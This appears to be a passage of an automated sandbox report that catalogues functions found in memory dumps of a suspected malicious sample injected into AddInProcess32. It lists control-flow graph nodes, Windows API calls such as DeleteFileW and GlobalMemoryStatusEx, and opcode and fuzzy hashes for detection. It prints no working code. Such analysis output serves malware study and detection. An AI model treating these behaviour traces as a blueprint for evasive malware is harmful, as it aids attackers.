                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0c4e576d38b069957184addd190c02bc669fafc3390bdf2183de74c21bbce96
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A72145B28002598FDB14CF9AD884BEEBBF5EF48310F14842AE858A3250D778A944CF60
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 012B8841 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 957 12b8841-12b8892 960 12b889a-12b88c5 DeleteFileW 957->960 961 12b8894-12b8897 957->961 962 12b88ce-12b88f6 960->962 963 12b88c7-12b88cd 960->963 961->960 963->962
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(00000000), ref: 012B88B8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2516510513.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_12b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DeleteFile
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                                                                                                                                    • Opcode ID: 1991edda93741659a4017d4d3b5cfa474aab64e658e55dfc0daea2b960e73787
                                                                                                                                                                                                                                                    • Instruction ID: 742f644944cc910d95e9cd39541b5876a9820108e7ade597a5c8fdc9bb0118df
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1991edda93741659a4017d4d3b5cfa474aab64e658e55dfc0daea2b960e73787
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C82147B2C0061A9FDB14CF9AD5847EEFBF4FB48310F14812AD918A7240D378A945CFA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 012B8848 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 966 12b8848-12b8892 968 12b889a-12b88c5 DeleteFileW 966->968 969 12b8894-12b8897 966->969 970 12b88ce-12b88f6 968->970 971 12b88c7-12b88cd 968->971 969->968 971->970
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(00000000), ref: 012B88B8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2516510513.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_12b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DeleteFile
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                                                                                                                                    • Opcode ID: 1e117b5061fe1395e1ef3d70d4e3802ed0904fd66dfb81a268da779823e5728b
                                                                                                                                                                                                                                                    • Instruction ID: f2c1eed8b254b45a298a5eac015192e24c55a0b625814bd295cdd601607c5383
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e117b5061fe1395e1ef3d70d4e3802ed0904fd66dfb81a268da779823e5728b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D01136B2C0061A9BDB14CF9AD5447DEFBB4FF48320F14812AD918A7240D378A944CFA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 012BF470 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 974 12bf470-12bf4e4 GlobalMemoryStatusEx 977 12bf4ed-12bf515 974->977 978 12bf4e6-12bf4ec 974->978 978->977
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GlobalMemoryStatusEx.KERNELBASE ref: 012BF4D7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2516510513.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_12b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1890195054-0
                                                                                                                                                                                                                                                    • Opcode ID: db8a6768022b5df6eaf12730be239d9e5f097c77de41956c9e2e0223bf296fb9
                                                                                                                                                                                                                                                    • Instruction ID: 950229abae18809e70847d6264e0e7070378bc05c28a0ecf8041338a45b3fa1c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db8a6768022b5df6eaf12730be239d9e5f097c77de41956c9e2e0223bf296fb9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F11E2B2C0065A9BDB24DF9AD544BDEFBF4FF48320F14816AD918A7240D378A944CFA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0669FECB Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1277 669fecb-669fef6 1291 669fef9 call 12bef00 1277->1291 1292 669fef9 call 12beef0 1277->1292 1279 669feff-669ff1e 1283 669ff26-669ff50 1279->1283 1286 669ff71 1283->1286 1287 669ff52-669ff6f 1283->1287 1288 669ff83-669ff8a 1286->1288 1287->1288 1291->1279 1292->1279
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: |
                                                                                                                                                                                                                                                    • API String ID: 0-2343686810
                                                                                                                                                                                                                                                    • Opcode ID: c8f5a15c52d90748da8c72cb4e658a9d9ed989ae321a16378290c48d2c5e3cf2
                                                                                                                                                                                                                                                    • Instruction ID: 739c7a61be71b34254bcf8e9b2baf68522906e39fe7f6217610bdf3a9c45c7ee
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8f5a15c52d90748da8c72cb4e658a9d9ed989ae321a16378290c48d2c5e3cf2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35117C71F40214DFDB54DB78C845BAEBBF5AF88700F108469E90AE73A0DB75A941CB94
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0669FED8 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1293 669fed8-669fef6 1306 669fef9 call 12bef00 1293->1306 1307 669fef9 call 12beef0 1293->1307 1294 669feff-669ff1e 1298 669ff26-669ff50 1294->1298 1301 669ff71 1298->1301 1302 669ff52-669ff6f 1298->1302 1303 669ff83-669ff8a 1301->1303 1302->1303 1306->1294 1307->1294
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: |
                                                                                                                                                                                                                                                    • API String ID: 0-2343686810
                                                                                                                                                                                                                                                    • Opcode ID: fbbd7194df495848834c52e38563f847844b9f052abb60b12ec28fa3ebb751c2
                                                                                                                                                                                                                                                    • Instruction ID: c163a5b096949fd8c13085c1b6fa1c6f1b95e39552e5472dc7d66116d05a07c2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbbd7194df495848834c52e38563f847844b9f052abb60b12ec28fa3ebb751c2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17114974F40214DFDB549B798804B6EBBF5AF88704F10846AE90AE73A0DA35A941CB94
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0669CF38 Relevance: .8, Instructions: 799COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 2031 669cf38-669cf53 2032 669cf55-669cf58 2031->2032 2033 669cf5a-669cf69 2032->2033 2034 669cfa1-669cfa4 2032->2034 2035 669cf78-669cf84 2033->2035 2036 669cf6b-669cf70 2033->2036 2037 669cfed-669cff0 2034->2037 2038 669cfa6-669cfe8 2034->2038 2039 669cf8a-669cf9c 2035->2039 2040 669d955-669d968 2035->2040 2036->2035 2041 669d039-669d03c 2037->2041 2042 669cff2-669d034 2037->2042 2038->2037 2039->2034 2054 669d96a-669d975 2040->2054 2055 669d976-669d98e 2040->2055 2044 669d03e-669d080 2041->2044 2045 669d085-669d088 2041->2045 2042->2041 2044->2045 2049 669d0ab-669d0ae 2045->2049 2050 669d08a-669d0a6 2045->2050 2052 669d0b0-669d0f2 2049->2052 2053 669d0f7-669d0fa 2049->2053 2050->2049 2052->2053 2059 669d0fc-669d13e 2053->2059 2060 669d143-669d146 2053->2060 2054->2055 2057 669d990-669d993 2055->2057 2064 669d995-669d9c1 2057->2064 2065 669d9c6-669d9c9 2057->2065 2059->2060 2066 669d148-669d157 2060->2066 2067 669d18f-669d192 2060->2067 2064->2065 2071 669d9d8-669d9db 2065->2071 2072 669d9cb call 669daad 2065->2072 2074 669d159-669d15e 2066->2074 2075 669d166-669d172 2066->2075 2069 669d1a1-669d1a4 2067->2069 2070 669d194-669d196 2067->2070 2080 669d1b3-669d1b6 2069->2080 2081 669d1a6-669d1a8 2069->2081 2078 669d19c 2070->2078 2079 669d421 2070->2079 2084 669d9dd-669d9f9 2071->2084 2085 669d9fe-669da00 2071->2085 2097 669d9d1-669d9d3 2072->2097 2074->2075 2075->2040 2086 669d178-669d18a 2075->2086 2078->2069 2088 669d424-669d430 2079->2088 2093 669d1b8-669d1fa 2080->2093 2094 669d1ff-669d202 2080->2094 2091 669d2df-669d2e8 2081->2091 2092 669d1ae 2081->2092 2084->2085 2089 669da02 2085->2089 2090 669da07-669da0a 2085->2090 2086->2067 2088->2066 2098 669d436-669d723 2088->2098 2089->2090 2090->2057 2100 669da0c-669da1b 2090->2100 2103 669d2ea-669d2ef 2091->2103 2104 669d2f7-669d303 2091->2104 2092->2080 2093->2094 2094->2088 2102 669d208-669d20b 2094->2102 2097->2071 2245 669d729-669d72f 2098->2245 2246 669d94a-669d954 2098->2246 2122 669da1d-669da80 call 6696598 2100->2122 2123 669da82-669da97 2100->2123 2111 669d20d-669d24f 2102->2111 2112 669d254-669d257 2102->2112 2103->2104 2113 669d309-669d31d 2104->2113 2114 669d414-669d419 2104->2114 2111->2112 2115 669d259-669d29b 2112->2115 2116 669d2a0-669d2a3 2112->2116 2113->2079 2137 669d323-669d335 2113->2137 2114->2079 2115->2116 2125 669d2ad-669d2b0 2116->2125 2126 669d2a5-669d2aa 2116->2126 2122->2123 2134 669d2cd-669d2cf 2125->2134 2135 669d2b2-669d2c8 2125->2135 2126->2125 2140 669d2d1 2134->2140 2141 669d2d6-669d2d9 2134->2141 2135->2134 2149 669d359-669d35b 2137->2149 2150 669d337-669d33d 2137->2150 2140->2141 2141->2032 2141->2091 2159 669d365-669d371 2149->2159 2154 669d33f 2150->2154 2155 669d341-669d34d 2150->2155 2160 669d34f-669d357 2154->2160 2155->2160 2169 669d37f 2159->2169 2170 669d373-669d37d 2159->2170 2160->2159 2173 669d384-669d386 2169->2173 2170->2173 2173->2079 2176 669d38c-669d3a8 call 6696598 2173->2176 2185 669d3aa-669d3af 2176->2185 2186 669d3b7-669d3c3 2176->2186 2185->2186 2186->2114 2188 669d3c5-669d412 2186->2188 2188->2079 2247 669d73e-669d747 2245->2247 2248 669d731-669d736 2245->2248 2247->2040 2249 669d74d-669d760 2247->2249 2248->2247 2251 669d93a-669d944 2249->2251 2252 669d766-669d76c 2249->2252 2251->2245 2251->2246 2253 669d77b-669d784 2252->2253 2254 669d76e-669d773 2252->2254 2253->2040 2255 669d78a-669d7ab 2253->2255 2254->2253 2258 669d7ba-669d7c3 2255->2258 2259 669d7ad-669d7b2 2255->2259 2258->2040 2260 669d7c9-669d7e6 2258->2260 2259->2258 2260->2251 2263 669d7ec-669d7f2 2260->2263 2263->2040 2264 669d7f8-669d811 2263->2264 2266 669d92d-669d934 2264->2266 2267 669d817-669d83e 2264->2267 2266->2251 2266->2263 2267->2040 2270 669d844-669d84e 2267->2270 2270->2040 2271 669d854-669d86b 2270->2271 2273 669d87a-669d895 2271->2273 2274 669d86d-669d878 2271->2274 2273->2266 2279 669d89b-669d8b4 call 6696598 2273->2279 2274->2273 2283 669d8c3-669d8cc 2279->2283 2284 669d8b6-669d8bb 2279->2284 2283->2040 2285 669d8d2-669d926 2283->2285 2284->2283 2285->2266
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d320f617efb2d858bd990213d56c80c96958df71611dd7229bc9638bba2c02e1
                                                                                                                                                                                                                                                    • Instruction ID: c98ff5bdc0f77490487eb5c0e5b8b3001eb376d5b69abc558cb0b539494adcbe
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d320f617efb2d858bd990213d56c80c96958df71611dd7229bc9638bba2c02e1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4626D30A006098FCB65EF68D590A5EB7E6FF85300F60CA68D4469F355DBB1EC86CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0669B638 Relevance: .5, Instructions: 469COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 28f227b3f6d72e9fb38dc02a769e5a2322c0b522e6fc7240d71dcc1073be5515
                                                                                                                                                                                                                                                    • Instruction ID: 8175f18bda179680bb94e8ad48fd815f3ebdc36c0f5dd4c9439a84e9d9672799
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28f227b3f6d72e9fb38dc02a769e5a2322c0b522e6fc7240d71dcc1073be5515
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51027F30E102098FDFA4DB69E5807AEB7B5FB45310F60852AD855EB395DB70EC81CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0669ACC0 Relevance: .4, Instructions: 389COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2eca16293ff0ca45c70181267c010ae7dcafb3c44fd1819c69ea9276586d16ec
                                                                                                                                                                                                                                                    • Instruction ID: 96031eda6804583a34b876d42879cb46d6c2d8a3aa381b295911b327f5095ceb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2eca16293ff0ca45c70181267c010ae7dcafb3c44fd1819c69ea9276586d16ec
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFE17030E102098FDF65DBA9D4906AEB7F6FF85310F608529E805EB355DB709C86CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06699148 Relevance: .2, Instructions: 230COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 018b16e641922c02da98b54d61fed83c18f92a84642985e05f2f4c730512a4f2
                                                                                                                                                                                                                                                    • Instruction ID: b46841947731097f0a0a4888817cb2ec82a09b89885c572fd0330fc0902f763d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 018b16e641922c02da98b54d61fed83c18f92a84642985e05f2f4c730512a4f2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3914070B402198FDF64EB69D8607AE77F6FF89300F148569D809EB384EE70AD418B91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 066961E8 Relevance: .2, Instructions: 229COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1b4887c710a93363a2bfb7d8905e6300a3105d5c1cabc071d588f21a32e838c0
                                                                                                                                                                                                                                                    • Instruction ID: 6d736c6945012ce37a9cd28e99efbe82ef070166fa416fded96e1397cd66d14c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b4887c710a93363a2bfb7d8905e6300a3105d5c1cabc071d588f21a32e838c0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4161B171F401104FDF559B6ECC8066EBADBAFD8620B658439D80ADB364DEB5EC0287D1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 066942A8 Relevance: .2, Instructions: 223COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: aa68d48d9455e07e4a05465fc3d7b51aebb4f34b9f6a627d986cbece0c7820ef
                                                                                                                                                                                                                                                    • Instruction ID: 6d8c015c5425403e7a69a2c005b11a6747c758fab2b515e5c789f355a93b6fa2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa68d48d9455e07e4a05465fc3d7b51aebb4f34b9f6a627d986cbece0c7820ef
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4811C70B402099FDF54EFB9D4A06AE7BE6BF89310F108529D819DB385EE35DC828B51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 066945C4 Relevance: .2, Instructions: 218COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: ccfef5fe5ed4794da46b6992df2b52897825514d4b872fdc02a1aebdff8ba7c3
                                                                                                                                                                                                                                                    • Instruction ID: c569df8a707dfeb071c6595965eac12fdcd470ccec14a373934dfe1bb5de9950
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ccfef5fe5ed4794da46b6992df2b52897825514d4b872fdc02a1aebdff8ba7c3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69913E30E106198FDF64DF68C880B99B7B5FF89310F208699D949BB345DB70A986CF91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 066945D8 Relevance: .2, Instructions: 210COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bd5aeaafd68ae0731ae0cc1fbbd4e59c25e6d44942ca52f781589c01bc82e9a0
                                                                                                                                                                                                                                                    • Instruction ID: bf27f962b1ae3d9bb69c3f26f0bbb84d4b81c7e990352de88c60bc54c2a4f5bc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd5aeaafd68ae0731ae0cc1fbbd4e59c25e6d44942ca52f781589c01bc82e9a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66914F30E106198BDF64DF68C880B9DB7B1FF89310F208599D949BB341EB70A986CF91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0669EB01 Relevance: .2, Instructions: 205COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d681676cc49dc31087060a9ac08fbe5d3906a4883d4765fcb7c896e71c019a83
                                                                                                                                                                                                                                                    • Instruction ID: d12b4df2574a7d67024cc55234b8f1c41b149fbc1a2e05e53952ee7c93ac29c4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d681676cc49dc31087060a9ac08fbe5d3906a4883d4765fcb7c896e71c019a83
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87714070A002099FDF54DBA9D990AAEBBFAFF88300F148529D855EB355DB31EC46CB50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0669EB10 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: cda490158b8b51560e6b1bec0417023bbcc8e99c603c11d9e0875d76fab20bba
                                                                                                                                                                                                                                                    • Instruction ID: a77756786f4101d7bc0131cc182c10393b86663ee55e6f4193398f6193117936
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cda490158b8b51560e6b1bec0417023bbcc8e99c603c11d9e0875d76fab20bba
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C715F70A002099FDF54DBA9D990AAEBBFAFF84300F148529D855EB354DB31EC46CB51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06694B70 Relevance: .2, Instructions: 186COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 511d69cce45359d6219b07af849caecd1f49a5eb1cb37cca0c467d086310bdc7
                                                                                                                                                                                                                                                    • Instruction ID: 33ac594f5861411c9d1bd6307324dbb6e33b743c43f3e192b3f37cae5b4ae44f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 511d69cce45359d6219b07af849caecd1f49a5eb1cb37cca0c467d086310bdc7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA615E34F402089FEF559FA5C8547AEBBF6FB88340F208529E506AB395DF718C468B91
                                                                                                                                                                                                                                                    Uniqueness

